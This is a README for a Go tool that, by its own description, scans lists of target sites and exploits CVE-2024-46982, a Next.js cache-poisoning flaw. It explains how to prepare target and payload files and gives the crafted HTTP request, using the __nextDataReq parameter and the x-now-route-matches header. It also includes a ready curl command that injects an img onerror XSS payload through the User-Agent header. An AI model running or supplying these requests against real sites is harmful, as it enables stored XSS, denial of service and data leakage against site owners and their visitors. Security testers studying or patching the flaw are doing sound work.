# Next.js Cache Poisoning Exploit

This tool automates the detection and exploitation of **CVE-2024-46982**, a cache poisoning vulnerability in **Next.js**, where **Server-Side Rendering (SSR) responses can be incorrectly cached as Static Site Generation (SSG)**. This misconfiguration can lead to **Stored XSS, DoS, and data leakage**, allowing attackers to inject malicious content into cached responses.



## Installation and Usage

### Prepare your target list

Create a file named **`targets.txt`** containing one target URL per line:

```plaintext
https://vulnerable-site.com
https://another-target.com
```
### Define custom payloads

Create a file named **`payloads.txt`** containing payloads that will be injected via the **User-Agent** header:
```plaintext
<img src=x onerror=alert('XSS_ALERT')>
```

### Run the exploit

Compile and execute the exploit with:

```bash
go run exploit.go -f targets.txt -p payloads.txt -d 5
```

## How It Works
- Reads the list of target URLs from targets.txt
- Iterates through each target and appends the vulnerable endpoint:
```http
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
```
- Sends multiple requests, each using a different payload from payloads.txt
- Analyzes the HTTP response for signs of successful injection:
  - If the payload appears in the response body → The target is vulnerable
  - If the response code is 200 OK and caching behavior is abnormal → Potentially vulnerable
  - If the response code is 403 Forbidden or 404 Not Found → Likely patched
- Displays results after testing all targets

## To manually verify:
Send a malicious request using curl:
```bash
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: <img src=x onerror=alert('XSS')>" \
     -H "x-now-route-matches: 1"
```

Visit the endpoint in a browser


## Requirements
- Go 1.21 or newer.
